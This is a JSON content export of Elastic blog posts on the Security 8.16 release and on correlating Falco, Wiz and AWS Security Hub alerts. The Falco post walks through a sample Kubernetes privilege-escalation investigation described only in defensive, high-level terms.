style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003e to pass on the inputs to the cloud security product team directly!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Extended session view support for Auditbeat and Auditd Manager","_metadata":{"uid":"cs5749fb9602b7b339"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eWith expanded session view support for Auditbeat and Auditd Manager datastreams, security analysts can now visualize Linux processes in a clear, tree-like structure. This allows for quicker identification of unusual behavior and a more efficient investigation of alerts.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eThis visual approach to understanding Linux processes reduces the complexity of analyzing system audit logs, providing a more intuitive way to investigate threats and support compliance efforts. The enhanced session view empowers teams to work more efficiently in protecting Linux environments.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0e7fa109062f40ed"}}},{"video":{"vidyard_uuid":"UPJtCMcTwjnPYa2dg61Bki","_metadata":{"uid":"cs8b8f68b37fe58e87"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Manual rule runs, alert suppression news, and more","_metadata":{"uid":"csc5c262bdd0fec8a2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Security 8.16 brings full \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/alert-suppression.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ealert suppression\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e support for several rule types, helping reduce alert volume and improve triage efficiency. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-management.html#manually-run-rules\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eManual rule runs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — now available in beta — allow detection engineers to test or rerun detection rules over selected periods. This functionality helps backfill alerts and assess the effectiveness of new rules against historical data, making it easier to refine detection capabilities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAn additional new feature allows users to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/cases-action-type.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecreate a case\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e directly from Elastic Security, streamlining investigations by aggregating multiple alerts into one case. These tools give security teams the flexibility to test, suppress, and manage alerts in a way that best suits their workflow.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAlso, a new option is added to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#load-prebuilt-rules\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eenable the rule at the time of installation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. The rule preview functionality is enhanced to show the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#view-rule-es-queries\" target=\"_self\"\u003eES requests\u003c/a\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e your ES|QL or EQL rules will execute.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1767123159c2e20c"}}},{"image":{"image":{"uid":"bltc50f1cc7ed442567","_version":1,"title":"image7.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:42:35.680Z","updated_at":"2024-11-08T21:42:35.680Z","content_type":"image/png","file_size":"151002","filename":"image7.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.247Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc50f1cc7ed442567/672e85cb7ca8e88c9d487ba6/image7.png"},"_metadata":{"uid":"csd87cc1bf9b5ff53b"},"caption_l10n":"","alt_text_l10n":"manual rule run","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Expansion of security integrations enhances visibility","_metadata":{"uid":"cs672c24443c0cdbc1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security continues to expand the integration \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003eecosystem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, allowing users to ingest threat intelligence from any API using custom threat intelligence packages. New integrations with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/sublime_security\"\u003e\u003cspan style='font-size: 12pt;'\u003eSublime Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/abnormal_security\"\u003e\u003cspan style='font-size: 12pt;'\u003eAbnormal Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e boost email monitoring capabilities, while Jamf adds deeper insights into the Apple ecosystem.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNetwork security is further strengthened through partnerships with Fortinet FortiProxy and Palo Alto Prisma Access. Teleport integration also improves access management monitoring — expanding visibility across your organization’s security infrastructure.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"TheHive case management integration","_metadata":{"uid":"cs69a1180d8ddfbe97"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/8.16/thehive-action-type.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eHive case connector\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e allows for seamless case creation and management directly from Elastic. Users can configure incident details like severity levels and tags, while maintaining separate status tracking across platforms. The integration supports flexible deployment with proxy and TLS settings that are easily managed via API key authentication.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Enhanced collaboration during investigations","_metadata":{"uid":"cs8af828a8d62b4533"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsers can now add notes during their investigative workflows. This feature is introduced within our event and alert detail experiences and allows users to add a comment via markdown. Up until this point, flexible collaboration like this has been limited to the case or timeline workflows. But now, teams can coordinate responses, threat hunt, or share investigative findings within the object directly. This will drastically improve the analyst experience as users will no longer need to keep notes in separate tools.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try it out","_metadata":{"uid":"cs316221b7dd526efd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead about these capabilities and more i\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003en the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003erelease notes\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExisting Elastic Cloud customers can access many of these features directly from the \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud console\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Not taking advantage of Elastic on cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse9aa86b5f3eb5ed7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4841618628fee944"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs99141233ded0e98c"}}}],"publish_date":"2024-11-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Security 8.16: Elastic AI Assistant updates and contextualized cloud detection and response","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blte9e24640ae46136e","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-01-10T14:59:33.212Z","updated_at":"2024-01-10T14:59:33.212Z","content_type":"image/jpeg","file_size":"155065","filename":"security-release-blog.jpg","title":"security-release-blog.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-01-17T19:00:25.348Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte9e24640ae46136e/659eb0d5fa886265ed8e0674/security-release-blog.jpg"},"title":"NEW Elastic Security 8.16: Elastic AI Assistant knowledge, cloud detection and response, and agentless integrations","title_l10n":"NEW Elastic Security 8.16: Elastic AI Assistant knowledge, cloud detection and response, and agentless integrations","updated_at":"2024-11-19T14:36:32.290Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/whats-new-elastic-security-8-16-0","publish_details":{"time":"2024-11-19T14:36:43.541Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5c450d813b05db05","title":"A unified protection approach: Elastic integrates across leading cloud security vendors","url":"/blog/elastic-integrates-leading-cloud-security-vendors","title_l10n":"A unified protection approach: Elastic integrates across leading cloud security vendors","subtitle_l10n":"Elastic’s integration with Falco, Wiz, and AWS Security Hub enhances threat detection and response for a unified approach to the complex cloud security landscape.","author":["blta7d0dd0fb0246103","bltf79747ba548dc6e3"],"publish_date":"2024-11-19","category":["bltb79594af7c5b4199"],"thumbnail_image":{"uid":"blt1f3249453eef79eb","_version":1,"title":"cloud-images-blog-headers-02 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-12T20:43:02.631Z","updated_at":"2024-11-12T20:43:02.631Z","content_type":"image/jpeg","file_size":"199837","filename":"cloud-images-blog-headers-02_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-19T14:28:13.211Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1f3249453eef79eb/6733bdd6c09b5dd154c4ccfa/cloud-images-blog-headers-02_(1).jpg"},"abstract_l10n":"In today’s digital era, cloud security is more complex than ever. This blog explores how integrating Elastic with Falco, Wiz, and AWS Security Hub streamlines threat detection and response, offering a unified approach to protect your digital assets.","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csecf228c7cb40c1a8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs organizations increasingly migrate their operations to the cloud, they face a myriad of security challenges. This shift has led to a proliferation of cloud security tools primarily due to:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiverse threat landscape:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The variety and sophistication of cyber threats have grown, necessitating specialized tools to combat different types of attacks from data breaches to ransomware.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eMulticloud environments:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Many organizations use multiple cloud service providers — each with its own security protocols and requirements — leading to the need for a diverse set of security tools.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnderstanding these factors is crucial for navigating the modern cloud security landscape and selecting the right tools to protect your organization’s digital assets.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The power of integration: Elastic and third-party cloud security tools","_metadata":{"uid":"cs381301023e26d8f3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eElastic Security has simplified cloud security by unifying\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/cloud-detection-and-response\"\u003e\u003cspan style='font-size: 12pt;'\u003ecloud detection and response\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003e (CDR) capabilities directly into the AI-driven security analytics solution\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. \u003c/span\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eElastic supports a wide variety o\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ef \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations?solution=all-solutions\u0026category=cloud\"\u003e\u003cspan style='font-size: 12pt;'\u003elog sources\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003e from major cloud providers, including AWS, Azure, and Google Cloud Platform, as well as key third-party cloud security tools like Falco, AWS Security Hub, Wiz, Crowdstrike, Sentinel One, and Microsoft Defender\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eUsing Elastic Security for SIEM allows organizations to achieve real-time threat detection, automated response, and comprehensive threat intelligence within a single platform.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Securing cloud environments: A real-world scenario of detecting and investigating privilege escalation","_metadata":{"uid":"csccf4067ff64d0f1d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs organizations increasingly migrate to the cloud, securing these environments against sophisticated threats becomes paramount. Cloud infrastructures offer unparalleled scalability and flexibility but also come with unique security challenges. One of the most critical concerns is the risk of privilege escalation, where an attacker gains unauthorized elevated access to resources and potentially compromises the entire cloud environment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The challenge","_metadata":{"uid":"cs83ad40cdb5ea6780"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCloud environments are inherently complex and dynamic. The frequent creation and destruction of virtual machines, containers, and other resources make it difficult to maintain consistent security policies and monitor activities in real time.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMisconfigurations in access controls, network policies, and security settings can create vulnerabilities that attackers can exploit. Additionally, the integration of various cloud services adds another layer of complexity, requiring security teams to secure both the cloud infrastructure and the applications running on it.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Real-world scenario","_metadata":{"uid":"csdc7bf82980d12808"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImagine Alex, a security analyst at a leading fintech company, is performing a routine alert triage when an urgent notification appears. It’s 2:15 p.m., and a security tool has detected suspicious activity in a cloud environment. The alert indicates unusual system calls, execution of unexpected binaries, and attempts to modify critical system files in a Kubernetes environment. This is a potential privilege escalation attempt, and Alex must act swiftly.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Integrated approach to threat detection and response","_metadata":{"uid":"csa1c8927c9a9a118a"},"header_style":"H3","paragraph_l10n":"\u003cp\u003eTo effectively address this threat, Alex uses an integrated security approach that combines real-time threat detection, response plan, and comprehensive threat intelligence. Here’s how this approach unfolds:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e1. Initial alert from Falco:\u003c/strong\u003e At 2:15 p.m., Alex receives a couple of alerts in the Elastic alerts page from Falco indicating suspicious activity in a Kubernetes cluster.\u003c/p\u003e\n\u003cp\u003eAlert: Suspicious activity detected in pod \u003cspan data-type='inlineCode'\u003enginx-787c85fb6b-sl4rm\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eUnusual system calls detected (attempt to read /etc/shadow)\n \u003c/li\u003e\n \u003cli\u003eExecution of unexpected binary (/bin/bash in a distroless container)\n \u003c/li\u003e\n \u003cli\u003eAttempt to modify critical system files\n \u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e2. Out-of-the-box correlation and enrichment:\u003c/strong\u003e As Alex opens the alert flyout, Elastic automatically correlates and enriches it with contextual information from Wiz and AWS Security Hub:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eFrom Wiz\n \u003cul\u003e\n \u003cli\u003eOverly permissive pod security policy detected\n \u003c/li\u003e\n \u003cli\u003eVulnerable application with CVE-2024-38821\n \u003c/li\u003e\n \u003cli\u003eRBAC misconfiguration: over privileged role with \u003cspan data-type='inlineCode'\u003e*\u003c/span\u003e permissions\n \u003c/li\u003e\n\u003c/ul\u003e\n \u003c/li\u003e\n\u003c/ul\u003e\n\n\u003cul\u003e\n \u003cli\u003eFrom AWS Security Hub\n \u003cul\u003e\n \u003cli\u003eEC2 instances hosting the Kubernetes node have outdated security patches\n \u003c/li\u003e\n \u003cli\u003eSecurity group allows unrestricted inbound access on port 10250 (kubelet)\n \u003c/li\u003e\n\u003c/ul\u003e\n \u003c/li\u003e\n\u003c/ul\u003e\n\n\u003cp\u003eThis vendor-neutral workflow enables Alex to see the full context of the alert without switching between multiple tools, saving valuable time.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e3. Response planning:\u003c/strong\u003e Based on the analysis, Alex quickly assesses the situation and formulates a response plan. The Elastic platform provides Alex with suggested actions based on best practices.\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eIsolate the affected pod to prevent potential lateral movement\n \u003c/li\u003e\n \u003cli\u003eCapture a snapshot of the pod's filesystem for forensic analysis\n \u003c/li\u003e\n \u003cli\u003eInitiate a cloud wide vulnerability scan focusing on CVE-2024-38821\n \u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eAlex reviews these suggestions and, using the bi-directional cloud connectors integrated with Elastic, prepares to manually execute these actions through the respective cloud and Kubernetes management interfaces.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e4. Threat intelligence integration:\u003c/strong\u003e To provide deeper context, Elastic seamlessly integrates relevant threat intelligence into the alert. The system automatically maps the detected activity to the MITRE ATT\u0026amp;CK framework, identifying it as a clear instance of the TA0004: Privilege escalation technique. Alex notices an additional insight: recent threat intelligence indicates that this specific attack pattern aligns with a known Kubernetes-focused campaign targeting financial institutions. This information elevates the urgency of the incident and helps Alex prioritize the response strategy.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e5. Incident response and reporting:\u003c/strong\u003e Armed with insights from the integrated platform, Alex swiftly responds by manually isolating the affected pod and initiating a filesystem snapshot for forensic analysis. Coordinating with the DevOps team, Alex launches a cluster-wide vulnerability scan focused on the identified CVE. Within Elastic, Alex compiles a preliminary report detailing the root cause analysis, the attack timeline, and a comprehensive remediation plan. This plan includes patching vulnerabilities, implementing least privilege policies, and tightening security configurations across the Kubernetes cluster and associated AWS infrastructure.\u003c/p\u003e\n\u003cp\u003eThe integrated view provided by Elastic that combines data from Falco, Wiz, and AWS Security Hub proves crucial in rapidly understanding and responding to the threat, enabling Alex to communicate effectively with stakeholders about the incident status and next steps.\u003c/p\u003e"}],"_metadata":{"uid":"cs3adc01dff730a921"}}},{"video":{"vidyard_uuid":"oYhqkWBsSsAbcnxKC8uPNk","_metadata":{"uid":"cs759a66d95dbae0ea"},"caption_l10n":"Sample live demo visualizing out-of-the-box correlation of vulnerabilities and misconfigurations in real-time alert","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Advantages of the integrated approach with Elastic Security","_metadata":{"uid":"cs8302003fdcc9516a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security for SIEM enriches alerts with contextual information from various sources, such as Falco, Wiz, and AWS Security Hub, providing a unified view of the security landscape.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eAI-driven insights from Elastic further enhance this process by automatically correlating data, identifying patterns, and prioritizing threats based on their potential impact. This enables security analysts like Alex to quickly understand the context of an alert, identify potential threats, and formulate effective response plans. Additionally, Elastic Security for SIEM’s automated best practice suggestions and seamless threat intelligence integration facilitate swift and informed decision-making, enhancing the overall efficiency and effectiveness of security operations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eAdopting Elastic Security for SIEM with AI insights ensures robust defense against privilege escalation and other sophisticated threats in cloud environments.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Implementing the integrated solution","_metadata":{"uid":"cs8bdf4e948a28549b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eTo implement this integrated solution, follow these steps:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003e\u003cstrong\u003eOnboard your runtime events from Falco and posture/vulnerabilities findings from AWS Security Hub/Wiz\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003e. Simply start by setting up integration with Falco, AWS Security Hub, or Wiz in your Elastic account. Choose from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003evarious integration options\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(17, 17, 17);font-size: 12pt;'\u003eThat's it from your end! Elastic takes care of the context enrichment and correlation to speed up your threat detection and investigation journey!\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Enhance your cloud security today","_metadata":{"uid":"csfb3ae03477d9dd59"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eStay ahead of the curve by embracing these new cloud security capabilities and ensure that your cloud environments remain secure, compliant, and resilient against the evolving threat landscape.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eWe welcome your feedback on which vendors you’d like to see included. Join our \u003c/span\u003e\u003ca href=\"https://elasticstack.slack.com/archives/C050VCUJY2H\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003ecommunity Slack\u003c/a\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003e to pass on the inputs to the cloud security product team directly!\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eExisting Elastic Cloud customers can access many of these features directly from the Elastic Cloud console. Not taking advantage of Elastic on cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview/security?utm_campaign=Google-B-Security-EMEA-C-DE-E\u0026utm_content=Security-Core-EXT\u0026utm_source=google\u0026utm_medium=cpc\u0026device=c\u0026utm_term=elastic%20security%20free\u0026gad_source=1\u0026gclid=Cj0KCQjw1Yy5BhD-ARIsAI0RbXbQ32jOCykACiFtBPu5NxDqWNs3K8Iz7RgyuwB7AOP7hmlHfEiZFusaArNUEALw_wcB\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cseb8ea99869d232c2"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbd1da82b9e01adf3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3a8f3c8d9746f4bb"}}}],"markdown_l10n":"","seo":{"seo_title_l10n":"Unified cloud security: Elastic with Falco, Wiz, and AWS Security Hub","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"tags_elastic_stack":[],"tags_industry":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}}],"tags_culture":[],"tags_partner":[],"table_of_contents":{"blog_series":[]},"sanity_migration_complete":false,"tags":[],"locale":"en-us","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-12T20:54:31.160Z","updated_at":"2024-11-19T14:28:07.619Z","ACL":{},"_version":5,"publish_details":{"time":"2024-12-02T02:00:47.934Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt8a7f349f28e7e9ab","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Observability 8.16 introduces enhancements to LLM observability, OpenTelemetry for Kubernetes via EDOT, and streamlined onboarding processes — simplifying setup and providing deeper insights into traditional and AI-powered 